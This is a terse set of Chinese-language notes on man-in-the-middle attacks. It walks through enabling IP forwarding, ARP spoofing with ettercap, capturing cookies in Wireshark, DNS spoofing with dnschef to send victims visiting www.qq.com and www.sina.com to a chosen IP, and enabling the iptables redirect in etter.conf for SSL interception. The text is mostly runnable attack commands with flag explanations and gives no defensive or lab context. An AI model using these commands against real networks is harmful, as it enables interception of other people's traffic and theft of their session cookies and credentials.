ARP 欺骗
- 启动路由转发
sysctl -w net.ipv4.ip_forward=1
- ARP 欺骗
- 打开WIRESHARK 运行并过滤想要抓取的协议
抓取到的Cookie:
DNS 欺骗
前提:目标DNS服务器指向你
dnschef --fakeip=180.101.49.11 --fakedomains=www.qq.com,www.sina.com --interface 192.168.2.106 -q
# fakeip:希望受害者访问的地址
# fakedomains:要欺骗的域名
# interface:本机地址
强大的Ettercap
目标格式
MAC/IPV4/IPv6/Pors
00:11:11:11:11:11:11:11/192.168.2.1//
ARP 欺骗
ettercap -Tq -M arp:remote -i eth0 /192.168.2.102// /192.168.2.1//
T:文本模式
q:安静模式
remote:双向欺骗
SSl 欺骗
需要先将iptables 打开
vi /etc/ettercap/etter.conf
#---------------
# Linux
#---------------
# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s %source -d %destination %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s %source -d %destination %port -j REDIRECT %rport"
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport"
# pendant for IPv6 - Note that you need iptables v1.4.16 or newer to use IPv6 redirect
#redir6_command_on = "ip6tables -t nat -A PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport"
#redir6_command_off = "ip6tables -t nat -D PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport"